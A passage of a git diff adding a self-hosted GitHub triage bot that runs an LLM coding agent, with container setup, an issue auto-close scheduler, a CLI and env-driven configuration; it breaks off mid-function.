ROBOMP_SQLITE_PATH: /data/robomp.sqlite + ROBOMP_LOG_DIR: /data/logs + # Bind on the internal network only. + ROBOMP_GH_PROXY_BIND_HOST: 0.0.0.0 + ROBOMP_GH_PROXY_BIND_PORT: 8081 + # Settings still requires these on construction; the proxy never uses + # them but the validator runs the same code path as the orchestrator. + GITHUB_WEBHOOK_SECRET: ${GITHUB_WEBHOOK_SECRET:?GITHUB_WEBHOOK_SECRET must be set in .env} + ROBOMP_BOT_LOGIN: ${ROBOMP_BOT_LOGIN:?ROBOMP_BOT_LOGIN must be set in .env} + ROBOMP_GIT_AUTHOR_EMAIL: ${ROBOMP_GIT_AUTHOR_EMAIL:?ROBOMP_GIT_AUTHOR_EMAIL must be set in .env} + ROBOMP_REPO_ALLOWLIST: ${ROBOMP_REPO_ALLOWLIST:?ROBOMP_REPO_ALLOWLIST must be set in .env} + networks: + # `default` gives gh-proxy outbound NAT to api.github.com; `robomp_internal` + # is how the orchestrator reaches it. No `ports:` mapping → still + # unreachable from the host or any sibling project. + - default + - robomp_internal + volumes: + # Shared workspace pool/worktrees so the proxy can drive git operations + # against the same per-issue worktrees the orchestrator builds. + - robomp_data:/data + +networks: + # External-facing bridge: webhook ingress (8080) and the orchestrator's + # outbound path to the host LLM gateway via extra_hosts. + default: {} + # Orchestrator <-> gh-proxy only. internal: true means no egress and no + # ingress from outside the compose project. + robomp_internal: + internal: true + +volumes: + # Docker-managed Linux volume so UID/GID permissions on /data are enforced. + robomp_data: {} diff --git a/python/robomp/entrypoint.sh b/python/robomp/entrypoint.sh new file mode 100755 index 000000000..a6aa67e9e --- /dev/null +++ b/python/robomp/entrypoint.sh @@ -0,0 +1,82 @@ +#!/usr/bin/env bash +# roboomp container entrypoint. No per-boot pip installs — everything is baked +# into the image; we only sanity-check the runtime mount and create state dirs. +# +# Used by both the orchestrator (CMD: `python -m robomp serve`) and the +# sibling gh-proxy (compose command: `python -m robomp.proxy serve`). The +# proxy role does NOT need a $PI_ROOT pi checkout — it never runs omp. +set -euo pipefail + +# Shared git metadata under /data/workspaces/_pool is intentionally group +# writable by the `omp` group so interrupted work can resume on a different +# slot user. Keep new files and directories compatible with that model. +umask 0002 + +# Detect the proxy role by inspecting the command. Compose passes `command:` +# as $@ here (after tini --), so $1=python, $2=-m, $3=robomp.proxy is the +# canonical shape; we also accept a single concatenated arg for safety. +is_proxy_role=0 +if [ "${1:-}" = "python" ] && [ "${2:-}" = "-m" ] && [[ "${3:-}" == robomp.proxy* ]]; then + is_proxy_role=1 +elif [[ "${1:-}" == *"robomp.proxy"* ]]; then + is_proxy_role=1 +fi + +/usr/sbin/groupadd -f -g 2000 omp +max_slots="${ROBOMP_MAX_CONCURRENCY:-8}" +for i in $(seq 1 "$max_slots"); do + user="omp-$i" + slot_group="omp-$i" + slot_id=$((2000 + i)) + /usr/sbin/groupadd -f -g "$slot_id" "$slot_group" + id -u "$user" >/dev/null 2>&1 || /usr/sbin/useradd -u "$slot_id" -g "$slot_group" -G omp -M -N -s /usr/sbin/nologin "$user" + /usr/sbin/usermod -g "$slot_group" -a -G omp "$user" +done + +if [ "$is_proxy_role" -eq 1 ]; then + exec "$@" +fi + +: "${PI_ROOT:=/work/pi}" +if [ ! -d "$PI_ROOT/packages/coding-agent" ]; then + echo "roboomp: PI_ROOT=$PI_ROOT does not look like a pi checkout (no packages/coding-agent/)" >&2 + exit 1 +fi + +mkdir -p /data/workspaces /data/workspaces/_pool /data/logs +# Persistent build caches under the /data volume. CARGO_HOME, +# CARGO_TARGET_DIR, and RUSTUP_HOME are pinned to these paths in the image ENV +# so every per-issue worktree shares one cargo target/toolchain. Bun install +# cache is workspace-private; a shared cache is unsafe across slot users +# because bun may chmod/chown its cache root to the first writer. +mkdir -p /data/cache/cargo /data/cache/cargo-target /data/cache/rustup /data/cache/pi-natives +chown -R root:omp /data/cache /data/workspaces/_pool +find /data/cache /data/workspaces/_pool -type d -exec chmod 2770 {} + +find /data/cache /data/workspaces/_pool -type f -perm /111 -exec chmod 0770 {} + +find /data/cache /data/workspaces/_pool -type f ! -perm /111 -exec chmod 0660 {} + +chmod 0700 /data/logs + + +rm -rf /srv/agent-home/.agent /srv/agent-home/.omp/agent +mkdir -p /srv/agent-home/.agent /srv/agent-home/.omp/agent +if [ -e /srv/agent-home-stage/.agent ]; then + cp -a /srv/agent-home-stage/.agent/. /srv/agent-home/.agent/ +fi +if [ -e /srv/agent-home-stage/.omp/agent ]; then + cp -a /srv/agent-home-stage/.omp/agent/. /srv/agent-home/.omp/agent/ +fi +chown -R root:root /srv/agent-home || true +find /srv/agent-home -type d -exec chmod 0755 {} + +find /srv/agent-home -type f -exec chmod 0644 {} + + +touch /data/robomp.sqlite +chown root:root /data/robomp.sqlite +chmod 0600 /data/robomp.sqlite +for db_file in /data/robomp.sqlite-wal /data/robomp.sqlite-shm; do + if [ -e "$db_file" ]; then + chown root:root "$db_file" + chmod 0600 "$db_file" + fi +done + +exec "$@" diff --git a/python/robomp/pyproject.toml b/python/robomp/pyproject.toml new file mode 100644 index 000000000..d4a8bbc67 --- /dev/null +++ b/python/robomp/pyproject.toml @@ -0,0 +1,76 @@ +[build-system] +requires = ["setuptools>=69"] +build-backend = "setuptools.build_meta" + +[project] +name = "robomp" +version = "0.1.0" +description = "Self-hosted GitHub triage/fix bot driving omp --mode rpc" +readme = "README.md" +requires-python = ">=3.11" +authors = [{ name = "robomp" }] +dependencies = [ + "fastapi>=0.112", + "uvicorn[standard]>=0.30", + "httpx>=0.27", + "pydantic>=2.6", + "pydantic-settings>=2.2", + "python-dotenv>=1.0", + "click>=8.1", + "omp-rpc>=0.1.0", +] + +[project.optional-dependencies] +dev = [ + "pytest>=8.0", + "pytest-asyncio>=0.23", + "respx>=0.21", + "ruff>=0.13", +] + +[project.scripts] +robomp = "robomp.cli:main" + +[tool.setuptools] +package-dir = { "robomp" = "src" } +packages = ["robomp", "robomp.proxy"] + +[tool.setuptools.package-data] +robomp = ["prompts/*", "py.typed", "static/*", "static/assets/*"] + +[tool.pytest.ini_options] +testpaths = ["tests"] +asyncio_mode = "auto" +filterwarnings = [ + "ignore::DeprecationWarning", +] + +[tool.ruff] +line-length = 120 +target-version = "py311" +src = ["src", "tests"] +extend-exclude = [".pi-context", "data"] + +[tool.ruff.lint] +select = [ + "E", "W", # pycodestyle + "F", # pyflakes + "I", # isort + "UP", # pyupgrade + "B", # flake8-bugbear + "C4", # comprehensions + "PIE", # misc lints +] +ignore = [ + "E501", # long lines (embedded HTML/SQL/prompts); formatter handles real cases + "B008", # FastAPI/Click rely on call-in-defaults (Depends, Option) +] + +[tool.ruff.lint.per-file-ignores] +"tests/*" = ["B011"] # assert False is fine in tests + +[tool.ruff.lint.isort] +known-first-party = ["robomp"] + +[tool.ruff.format] +quote-style = "double" diff --git a/python/robomp/scripts/ping.sh b/python/robomp/scripts/ping.sh new file mode 100755 index 000000000..df6eaa006 --- /dev/null +++ b/python/robomp/scripts/ping.sh @@ -0,0 +1,17 @@ +#!/usr/bin/env bash +# POST a synthetic ping to /webhook/github, signed with $GITHUB_WEBHOOK_SECRET. +set -euo pipefail + +: "${GITHUB_WEBHOOK_SECRET:?missing in .env}" +: "${ROBOMP_BIND_PORT:=8080}" + +body='{"zen":"bun ping","hook_id":0}' +sig="sha256=$(printf '%s' "$body" | openssl dgst -sha256 -hmac "$GITHUB_WEBHOOK_SECRET" -r | awk '{print $1}')" + +curl -fsS -X POST "http://localhost:${ROBOMP_BIND_PORT}/webhook/github" \ + -H 'Content-Type: application/json' \ + -H 'X-GitHub-Event: ping' \ + -H "X-GitHub-Delivery: bun-$(date +%s)" \ + -H "X-Hub-Signature-256: $sig" \ + --data "$body" +echo diff --git a/python/robomp/src/__init__.py b/python/robomp/src/__init__.py new file mode 100644 index 000000000..acec5a17a --- /dev/null +++ b/python/robomp/src/__init__.py @@ -0,0 +1,3 @@ +"""roboomp — self-hosted GitHub triage/fix bot driving omp --mode rpc.""" + +__version__ = "0.1.0" diff --git a/python/robomp/src/__main__.py b/python/robomp/src/__main__.py new file mode 100644 index 000000000..54bcf0447 --- /dev/null +++ b/python/robomp/src/__main__.py @@ -0,0 +1,4 @@ +from robomp.cli import main + +if __name__ == "__main__": + main() diff --git a/python/robomp/src/autoclose.py b/python/robomp/src/autoclose.py new file mode 100644 index 000000000..84f300322 --- /dev/null +++ b/python/robomp/src/autoclose.py @@ -0,0 +1,194 @@ +"""Background scheduler that closes question issues after a quiet window. + +Driven entirely by rows in `pending_closures`: + - `_build_post_comment` inserts a row when the bot answers a `question` issue. + - The webhook handler cancels the row when the original author replies, the + issue is closed externally, or any other event signals the human is still + engaged. + - This loop atomically claims due rows, checks for a 👎 from the issue's + original author on the watched comment, and either cancels (author voted + down) or closes the issue with `state_reason=completed`. + +The loop is the only writer of terminal `closed`/`cancelled` states for rows +it has claimed, so the cancellation hook + the scheduler never race on the +same row. +""" + +from __future__ import annotations + +import asyncio +import logging +from datetime import UTC, datetime + +from robomp.config import Settings +from robomp.db import Database, PendingClosureRow +from robomp.github_backend import GitHubBackend +from robomp.github_client import GitHubError + +log = logging.getLogger(__name__) + + +def _utcnow_iso() -> str: + return datetime.now(UTC).strftime("%Y-%m-%dT%H:%M:%S.%fZ") + + +class AutocloseScheduler: + """Long-lived coroutine that closes due `pending_closures` rows. + + Design choices: + - One DB claim per tick (atomic `pending -> claimed`) prevents two + ticks from acting on the same row, even if a previous tick was + interrupted. + - GitHub calls happen sequentially per tick. Auto-close volume is bounded + by question-issue volume; concurrency would buy nothing here. + - A failed close requeues the row to `pending` so the next tick retries. + - 404 on close (issue already gone) finalizes as `cancelled` with reason + `already_closed` rather than retrying forever. + """ + + def __init__( + self, + *, + settings: Settings, + db: Database, + github: GitHubBackend, + ) -> None: + self._settings = settings + self._db = db + self._github = github + self._task: asyncio.Task[None] | None = None + self._stop_event: asyncio.Event | None = None + + @property + def enabled(self) -> bool: + return ( + self._settings.question_autoclose_enabled + and self._settings.question_autoclose_hours > 0 + and self._settings.question_autoclose_scan_seconds > 0 + ) + + async def start(self) -> None: + """Spawn the background loop. No-op when the feature is disabled.""" + if not self.enabled: + log.info( + "autoclose disabled", + extra={ + "enabled": self._settings.question_autoclose_enabled, + "hours": self._settings.question_autoclose_hours, + }, + ) + return + if self._task is not None: + return + self._stop_event = asyncio.Event() + self._task = asyncio.create_task(self._run(), name="autoclose-scheduler") + log.info( + "autoclose started", + extra={ + "scan_seconds": self._settings.question_autoclose_scan_seconds, + "hours": self._settings.question_autoclose_hours, + }, + ) + + async def stop(self) -> None: + """Signal the loop to exit and await its termination.""" + if self._task is None: + return + assert self._stop_event is not None + self._stop_event.set() + try: + await asyncio.wait_for(self._task, timeout=5.0) + except TimeoutError: + self._task.cancel() + try: + await self._task + except (asyncio.CancelledError, Exception): + pass + finally: + self._task = None + self._stop_event = None + + async def _run(self) -> None: + assert self._stop_event is not None + scan_seconds = float(self._settings.question_autoclose_scan_seconds) + while not self._stop_event.is_set(): + try: + await self.tick() + except Exception: + log.exception("autoclose tick failed") + try: + await asyncio.wait_for(self._stop_event.wait(), timeout=scan_seconds) + except TimeoutError: + continue + + async def tick(self) -> dict[str, int]: + """Process all due rows. Exposed for tests. + + Returns a counter dict (`closed`, `cancelled`, `retried`) summarizing + what happened on this tick. + """ + rows = self._db.claim_due_closures(now=_utcnow_iso()) + counts = {"closed": 0, "cancelled": 0, "retried": 0} + for row in rows: + outcome = await self._process_row(row) + counts[outcome] = counts.get(outcome, 0) + 1 + if rows: + log.info( + "autoclose tick", + extra={ + "closed": counts["closed"], + "cancelled": counts["cancelled"], + "retried": counts["retried"], + "total": len(rows), + }, + ) + return counts + + async def _process_row(self, row: PendingClosureRow) -> str: + """Resolve a single claimed row. Returns `closed`/`cancelled`/`retried`.""" + try: + reactions = await self._github.list_comment_reactions(row.repo, row.comment_id) + except GitHubError as exc: + log.warning( + "autoclose: list_comment_reactions failed; will retry", + extra={"issue_key": row.issue_key, "status": exc.status, "gh_message": exc.message}, + ) + self._db.requeue_claimed_closure(row.issue_key) + return "retried" + + author = row.issue_author.lower() + author_downvoted = any(r.content == "-1" and r.user_login.lower() == author for r in reactions) + if author_downvoted: + self._db.finalize_closure(row.issue_key, state="cancelled", reason="author_downvoted") + log.info( + "autoclose cancelled by author 👎", + extra={"issue_key": row.issue_key, "comment_id": row.comment_id}, + ) + return "cancelled" + + try: + await self._github.close_issue(row.repo, row.number, reason="completed") + except GitHubError as exc: + if exc.status == 404: + self._db.finalize_closure(row.issue_key, state="cancelled", reason="already_closed") + log.info( + "autoclose: issue already gone", + extra={"issue_key": row.issue_key}, + ) + return "cancelled" + log.warning( + "autoclose: close_issue failed; will retry", + extra={"issue_key": row.issue_key, "status": exc.status, "gh_message": exc.message}, + ) + self._db.requeue_claimed_closure(row.issue_key) + return "retried" + + self._db.finalize_closure(row.issue_key, state="closed", reason=None) + log.info( + "autoclose closed issue", + extra={"issue_key": row.issue_key, "number": row.number}, + ) + return "closed" + + +__all__ = ["AutocloseScheduler"] diff --git a/python/robomp/src/cancellation.py b/python/robomp/src/cancellation.py new file mode 100644 index 000000000..a75958e4d --- /dev/null +++ b/python/robomp/src/cancellation.py @@ -0,0 +1,73 @@ +"""Per-event cancellation primitives shared by `WorkerPool` and the workers. + +The dispatcher sets `_current_event` to `(pool, delivery_id)` for the lifetime +of a single event. Worker threads call `register_cancel_hook` / `unregister_cancel_hook` +from inside that scope to attach a stop callable the pool can fire on demand. +The contextvar propagates through `asyncio.to_thread` automatically because +`asyncio` copies the current context into the executed coroutine context. + +Kept in its own module so `worker.py` doesn't have to import `queue.py` (the +dispatcher already imports `tasks`, which imports `worker` — a cycle). +""" + +from __future__ import annotations + +import contextvars +import logging +from collections.abc import Callable +from typing import Protocol + +log = logging.getLogger(__name__) + + +class _CancelSink(Protocol): + """Just the slice of `WorkerPool` the helpers below depend on.""" + + def _arm_cancel(self, delivery_id: str, hook: Callable[[], None]) -> None: ... + def _disarm_cancel(self, delivery_id: str) -> None: ... + + +_current_event: contextvars.ContextVar[tuple[_CancelSink, str] | None] = contextvars.ContextVar( + "robomp_current_event", default=None +) + + +def set_current_event(sink: _CancelSink, delivery_id: str) -> contextvars.Token: + """Open a per-event cancellation scope; returns a reset token for the caller.""" + return _current_event.set((sink, delivery_id)) + + +def clear_current_event(token: contextvars.Token) -> None: + """Close the scope opened by `set_current_event`.""" + _current_event.reset(token) + + +def register_cancel_hook(hook: Callable[[], None]) -> None: + """Arm cancellation for the event currently running on this thread. + + Called from the worker thread once it owns a resource that can be safely + torn down from outside (e.g. an `RpcClient` whose `.stop()` kills the + subprocess). Safe to call when no event context is active — no-ops. + """ + ctx = _current_event.get() + if ctx is None: + return + sink, delivery_id = ctx + sink._arm_cancel(delivery_id, hook) + + +def unregister_cancel_hook() -> None: + """Disarm cancellation for the current event. Idempotent.""" + ctx = _current_event.get() + if ctx is None: + return + sink, delivery_id = ctx + sink._disarm_cancel(delivery_id) + + +__all__ = [ + "clear_current_event", + "register_cancel_hook", + "set_current_event", + "unregister_cancel_hook", +] diff --git a/python/robomp/src/cli.py b/python/robomp/src/cli.py new file mode 100644 index 000000000..5d89d7d23 --- /dev/null +++ b/python/robomp/src/cli.py @@ -0,0 +1,223 @@ +"""Command-line interface.""" + +from __future__ import annotations + +import asyncio +import json +import sys + +import click +import uvicorn + +from robomp.config import Settings, get_settings +from robomp.db import INACTIVE_EVENT_STATES, get_database +from robomp.logging_config import configure_logging +from robomp.manual_triage import ( + InvalidIssueRef, + ManualTriageError, + ManualTriageTimeout, + await_terminal_state, + enqueue_manual_triage, + parse_issue_ref, +) +from robomp.proxy_client import GitHubProxyClient +from robomp.sandbox import SandboxManager +from robomp.server import create_app + + +def _settings_or_die() -> Settings: + try: + return get_settings() + except Exception as exc: + click.echo(f"configuration error: {exc}", err=True) + sys.exit(2) + + +def _require_proxy_mode(cfg: Settings) -> tuple[str, bytes]: + if cfg.github_token is not None: + raise SystemExit( + "robomp orchestrator refuses to start with GITHUB_TOKEN set in env. " + "The PAT must live only in the gh-proxy container." + ) + if cfg.gh_proxy_url is None or cfg.gh_proxy_hmac_key is None: + raise SystemExit( + "robomp orchestrator requires ROBOMP_GH_PROXY_URL and " + "ROBOMP_GH_PROXY_HMAC_KEY (run gh-proxy in a sibling container)." + ) + return cfg.gh_proxy_url, cfg.gh_proxy_hmac_key.get_secret_value().encode("utf-8") + + +def _build_github(cfg: Settings) -> GitHubProxyClient: + base_url, key = _require_proxy_mode(cfg) + return GitHubProxyClient(base_url=base_url, hmac_key=key) + + +def _default_wait_timeout(cfg: Settings) -> float: + return cfg.task_timeout_seconds + cfg.task_timeout_hard_grace_seconds + 30.0 + + +@click.group() +def main() -> None: + """roboomp control surface.""" + + +@main.command() +def serve() -> None: + """Run the webhook receiver + worker pool.""" + cfg = _settings_or_die() + configure_logging(cfg.log_dir) + cfg.ensure_paths() + app = create_app(cfg) + uvicorn.run(app, host=cfg.bind_host, port=cfg.bind_port, log_config=None) + + +@main.command() +@click.argument("issue_ref") +@click.option( + "--wait-timeout", + type=click.FloatRange(min=0.1), + default=None, + help="Seconds to wait for a terminal state before returning non-zero (default: task timeout + hard grace + 30).", +) +def triage(issue_ref: str, wait_timeout: float | None) -> None: + """Fetch a live issue and queue it as if a webhook arrived. + + ISSUE_REF is `owner/repo#NN`. + """ + cfg = _settings_or_die() + configure_logging(cfg.log_dir) + cfg.ensure_paths() + try: + repo_full, number = parse_issue_ref(issue_ref) + except InvalidIssueRef as exc: + click.echo(str(exc), err=True) + sys.exit(2) + if not cfg.allows(repo_full): + click.echo(f"refusing: {repo_full} not in ROBOMP_REPO_ALLOWLIST", err=True) + sys.exit(2) + + async def _go() -> None: + github = _build_github(cfg) + db = get_database(cfg.sqlite_path) + try: + delivery = await enqueue_manual_triage( + db=db, + github=github, + repo_full=repo_full, + number=number, + ) + except ManualTriageError as exc: + click.echo(f"refusing: {exc}", err=True) + sys.exit(2) + # The dispatcher loop lives in the long-running `serve` process; we + # only watch the row land in a terminal state. Wake latency is + # bounded by `WorkerPool._dispatch_loop`'s 10s `_wakeup.wait()` fallback. + click.echo(json.dumps({"delivery": delivery, "state": "queued"}, indent=2)) + timeout = wait_timeout if wait_timeout is not None else _default_wait_timeout(cfg) + try: + final = await await_terminal_state(db, delivery, timeout=timeout) + except ManualTriageTimeout as exc: + click.echo( + json.dumps( + {"delivery": delivery, "state": exc.state, "timed_out": True, "error": str(exc)}, + indent=2, + ), + err=True, + ) + sys.exit(1) + if final is None: + click.echo(json.dumps({"delivery": delivery, "state": "missing"}, indent=2)) + return + click.echo( + json.dumps( + {"delivery": delivery, "state": final.state, "error": final.last_error}, + indent=2, + ) + ) + + asyncio.run(_go()) + + +@main.command() +@click.argument("delivery_id") +@click.option( + "--wait-timeout", + type=click.FloatRange(min=0.1), + default=None, + help="Seconds to wait for a terminal state before returning non-zero (default: task timeout + hard grace + 30).", +) +def replay(delivery_id: str, wait_timeout: float | None) -> None: + """Re-enqueue a stored event so the running `serve` pool can pick it up.""" + cfg = _settings_or_die() + configure_logging(cfg.log_dir) + cfg.ensure_paths() + db = get_database(cfg.sqlite_path) + row = db.get_event(delivery_id) + if row is None: + click.echo(f"unknown delivery: {delivery_id}", err=True) + sys.exit(2) + if not db.requeue_event(delivery_id, from_states=INACTIVE_EVENT_STATES): + click.echo( + f"delivery {delivery_id} is {row.state}; only inactive events can be replayed", + err=True, + ) + sys.exit(2) + + async def _wait() -> None: + timeout = wait_timeout if wait_timeout is not None else _default_wait_timeout(cfg) + try: + final = await await_terminal_state(db, delivery_id, timeout=timeout) + except ManualTriageTimeout as exc: + click.echo( + json.dumps( + {"delivery": delivery_id, "state": exc.state, "timed_out": True, "error": str(exc)}, + indent=2, + ), + err=True, + ) + sys.exit(1) + if final is None: + click.echo(json.dumps({"delivery": delivery_id, "state": "missing"}, indent=2)) + return + click.echo( + json.dumps( + {"delivery": delivery_id, "state": final.state, "error": final.last_error}, + indent=2, + ) + ) + + asyncio.run(_wait()) + + +@main.command() +def status() -> None: + """Dump the issue table.""" + cfg = _settings_or_die() + cfg.ensure_paths() + db = get_database(cfg.sqlite_path) + rows = db.list_issues() + for r in rows: + click.echo( + f"{r.key:<40} state={r.state:<12} pr={r.pr_number or '-'} branch={r.branch or '-'} updated={r.updated_at}" + ) + + +@main.command() +@click.argument("issue_key") +def cleanup(issue_key: str) -> None: + """Force-remove the workspace for an issue (does not touch the remote).""" + cfg = _settings_or_die() + cfg.ensure_paths() + db = get_database(cfg.sqlite_path) + row = db.get_issue(issue_key) + if row is None: + click.echo(f"unknown issue: {issue_key}", err=True) + sys.exit(2) + sandbox = SandboxManager(cfg.workspace_root) + sandbox.remove_workspace(repo=row.repo, number=row.number) + db.set_issue_state(issue_key, "abandoned") + click.echo(f"cleaned up {issue_key}") + + +if __name__ == "__main__": + main() diff --git a/python/robomp/src/config.py b/python/robomp/src/config.py new file mode 100644 index 000000000..bec0815d5 --- /dev/null +++ b/python/robomp/src/config.py @@ -0,0 +1,381 @@ +"""Env-driven configuration for roboomp.""" + +from __future__ import annotations + +import random +from functools import cache +from pathlib import Path +from typing import Literal + +from pydantic import Field, SecretStr, field_validator, model_validator +from pydantic_settings import BaseSettings, SettingsConfigDict + +ThinkingLevel = Literal["off", "low", "medium", "high", "xhigh"] + + +class Settings(BaseSettings): + """Strongly-typed runtime configuration. + + Loaded from process env, optionally pre-populated by `.env`. + """ + + model_config = SettingsConfigDict( + env_file=".env", + env_file_encoding="utf-8", + extra="ignore", + case_sensitive=False, + ) + + # GitHub + # `github_token` is REQUIRED on the gh-proxy side (it holds the PAT) and + # OPTIONAL on the orchestrator side when `gh_proxy_url` is configured — + # the orchestrator then talks to gh-proxy over HMAC RPC and never sees + # the PAT. Validated end-to-end in `_validate_proxy_or_pat` below. + github_token: SecretStr | None = Field(None, alias="GITHUB_TOKEN") + github_webhook_secret: SecretStr = Field(..., alias="GITHUB_WEBHOOK_SECRET") + bot_login: str = Field(..., alias="ROBOMP_BOT_LOGIN") + git_author_name: str | None = Field(None, alias="ROBOMP_GIT_AUTHOR_NAME") + git_author_email: str = Field(..., alias="ROBOMP_GIT_AUTHOR_EMAIL") + repo_allowlist_raw: str = Field("", alias="ROBOMP_REPO_ALLOWLIST") + + # gh-proxy. Set BOTH to route GitHub through the proxy; leave both empty + # to keep PAT-on-orchestrator behavior. Mixing the two (PAT + proxy) is + # rejected to prevent silent fallback to direct GitHub access. + gh_proxy_url: str | None = Field(None, alias="ROBOMP_GH_PROXY_URL") + gh_proxy_hmac_key: SecretStr | None = Field(None, alias="ROBOMP_GH_PROXY_HMAC_KEY") + # Bind address for `python -m robomp.proxy serve`. Internal-only by + # default; gh-proxy never exposes a host port. + gh_proxy_bind_host: str = Field("0.0.0.0", alias="ROBOMP_GH_PROXY_BIND_HOST") + gh_proxy_bind_port: int = Field(8081, alias="ROBOMP_GH_PROXY_BIND_PORT") + + # gh-proxy: maximum request body size (bytes). Bodies larger than this + # are rejected with 413 BEFORE the proxy reads them into memory. Tight + # by design — every typed endpoint payload fits in a few KB. + gh_proxy_max_body_bytes: int = Field(1 << 20, alias="ROBOMP_GH_PROXY_MAX_BODY_BYTES") + # Hard wall-clock budget (seconds) for a single git subprocess invoked + # by gh-proxy. Bounds how long a hung git can pin a request handler. + gh_proxy_git_timeout_seconds: float = Field(60.0, alias="ROBOMP_GH_PROXY_GIT_TIMEOUT_SECONDS") + + # Model selection + model: str = Field("anthropic/claude-sonnet-4-6", alias="ROBOMP_MODEL") + provider: str | None = Field(None, alias="ROBOMP_PROVIDER") + thinking_level: ThinkingLevel = Field("high", alias="ROBOMP_THINKING") + + # Runtime + max_concurrency: int = Field(8, alias="ROBOMP_MAX_CONCURRENCY") + task_timeout_seconds: float = Field(2400.0, alias="ROBOMP_TASK_TIMEOUT_SECONDS") + task_timeout_hard_grace_seconds: float = Field(60.0, alias="ROBOMP_TASK_TIMEOUT_HARD_GRACE_SECONDS") + request_timeout_seconds: float = Field(120.0, alias="ROBOMP_REQUEST_TIMEOUT_SECONDS") + # Premature-end reminder. When a `triage_issue` turn ends without the + # agent having reached a terminal tool (`gh_open_pr`, + # `mark_unable_to_reproduce`, `abort_task`) for a `bug`/`documentation` + # classification, the driver sends up to this many "you stopped before + # opening a PR — continue" reminder prompts into the same omp session. + # Set to 0 to disable. + task_completion_max_reminders: int = Field(2, alias="ROBOMP_TASK_COMPLETION_MAX_REMINDERS") + omp_command: str = Field("omp", alias="ROBOMP_OMP_COMMAND") + + # Graceful shutdown (Phase B). On SIGTERM the dispatcher stops claiming + # new work, then waits up to `drain` seconds for in-flight events to + # complete cleanly; any still running after that get their omp + # subprocess killed and the row left in `running` so it requeues on + # next start. Sum of both MUST stay below the compose `stop_grace_period`. + shutdown_drain_timeout_seconds: float = Field(25.0, alias="ROBOMP_SHUTDOWN_DRAIN_TIMEOUT_SECONDS") + shutdown_kill_timeout_seconds: float = Field(5.0, alias="ROBOMP_SHUTDOWN_KILL_TIMEOUT_SECONDS") + + # Paths + workspace_root: Path = Field(Path("./data/workspaces"), alias="ROBOMP_WORKSPACE_ROOT") + sqlite_path: Path = Field(Path("./data/robomp.sqlite"), alias="ROBOMP_SQLITE_PATH") + log_dir: Path = Field(Path("./data/logs"), alias="ROBOMP_LOG_DIR") + + # Server + bind_host: str = Field("0.0.0.0", alias="ROBOMP_BIND_HOST") + bind_port: int = Field(8080, alias="ROBOMP_BIND_PORT") + + # Dev-only replay header value; if empty, /replay is disabled + replay_token: SecretStr | None = Field(None, alias="ROBOMP_REPLAY_TOKEN") + + # Per-submitter rate limiting. `window_seconds` defines the rolling window; + # `default` is the per-window cap for unknown/first-time submitters; + # `contributor` is the cap for accounts whose GitHub author_association is + # `CONTRIBUTOR` (i.e. already has a merged PR). `unlimited_raw` is a + # comma-separated allowlist of logins that bypass the limiter entirely; + # accounts with author_association OWNER/MEMBER/COLLABORATOR also bypass. + rate_limit_window_seconds: float = Field(3600.0, alias="ROBOMP_RATE_LIMIT_WINDOW_SECONDS") + rate_limit_default: int = Field(3, alias="ROBOMP_RATE_LIMIT_DEFAULT") + rate_limit_contributor: int = Field(10, alias="ROBOMP_RATE_LIMIT_CONTRIBUTOR") + rate_limit_unlimited_raw: str = Field("", alias="ROBOMP_RATE_LIMIT_UNLIMITED") + # Logins (comma-separated, `@` prefix optional) whose `@bot_login` + # mentions are treated as authoritative directives. These accounts also + # bypass rate limiting regardless of `author_association`. + maintainer_logins_raw: str = Field("", alias="ROBOMP_MAINTAINER_LOGINS") + # Bot logins (e.g. chatgpt-codex-connector) whose comments/reviews are + # treated as authoritative directives without requiring an `@bot` mention. + # Comma-separated; `@` prefix optional. + reviewer_bots_raw: str = Field("", alias="ROBOMP_REVIEWER_BOTS") + + # Question auto-close. When the bot answers an issue classified as + # `question`, the comment is suffixed with a 👎-to-keep-open prompt and a + # row is scheduled in `pending_closures`. The scheduler closes the issue + # after `question_autoclose_hours` unless the issue author downvoted the + # comment, a human follow-up arrived, or the issue was closed externally. + # Set `question_autoclose_enabled=False` (or hours <= 0) to disable. + question_autoclose_enabled: bool = Field(True, alias="ROBOMP_QUESTION_AUTOCLOSE_ENABLED") + question_autoclose_hours: float = Field(4.0, alias="ROBOMP_QUESTION_AUTOCLOSE_HOURS") + question_autoclose_scan_seconds: float = Field(60.0, alias="ROBOMP_QUESTION_AUTOCLOSE_SCAN_SECONDS") + + # pi-natives build-output cache. Hardlinks pre-built + # `packages/natives/native/*.node` (and its companions) into new + # workspaces keyed by the git tree-hashes of inputs that determine the + # build output. Misses are captured automatically when a task that + # finishes successfully has fresh artifacts. Disable to fall back to + # per-workspace builds. + natives_cache_enabled: bool = Field(True, alias="ROBOMP_NATIVES_CACHE_ENABLED") + natives_cache_root: Path = Field(Path("/data/cache/pi-natives"), alias="ROBOMP_NATIVES_CACHE_ROOT") + natives_cache_max_entries_per_repo: int = Field(8, alias="ROBOMP_NATIVES_CACHE_MAX_ENTRIES_PER_REPO") + natives_cache_max_bytes: int = Field(4 * 1024**3, alias="ROBOMP_NATIVES_CACHE_MAX_BYTES") + natives_cache_gc_interval_seconds: float = Field(3600.0, alias="ROBOMP_NATIVES_CACHE_GC_INTERVAL_SECONDS") + + @field_validator("bot_login", mode="after") + @classmethod + def _require_bot_login(cls, value: str) -> str: + cleaned = value.strip() + if not cleaned: + raise ValueError("ROBOMP_BOT_LOGIN must be a non-empty GitHub login") + return cleaned + + @field_validator("replay_token", mode="before") + @classmethod + def _blank_replay_disables(cls, value: object) -> object: + # Treat empty/whitespace strings as 'disabled'. Without this, an empty + # ROBOMP_REPLAY_TOKEN becomes SecretStr("") which the server would + # happily compare against an empty X-Robomp-Replay-Token header. + if isinstance(value, str) and not value.strip(): + return None + if hasattr(value, "get_secret_value"): + inner = value.get_secret_value() # type: ignore[attr-defined] + if isinstance(inner, str) and not inner.strip(): + return None + return value + + @field_validator("github_token", mode="before") + @classmethod + def _blank_token_disables(cls, value: object) -> object: + """Treat empty/whitespace `GITHUB_TOKEN` as 'unset' so proxy-only + deployments don't have to remove the env var.""" + if isinstance(value, str) and not value.strip(): + return None + if hasattr(value, "get_secret_value"): + inner = value.get_secret_value() # type: ignore[attr-defined] + if isinstance(inner, str) and not inner.strip(): + return None + return value + + @field_validator("gh_proxy_url", mode="before") + @classmethod + def _blank_proxy_url_disables(cls, value: object) -> object: + if isinstance(value, str) and not value.strip(): + return None + return value + + @field_validator("gh_proxy_hmac_key", mode="before") + @classmethod + def _blank_proxy_key_disables(cls, value: object) -> object: + if isinstance(value, str) and not value.strip(): + return None + if hasattr(value, "get_secret_value"): + inner = value.get_secret_value() # 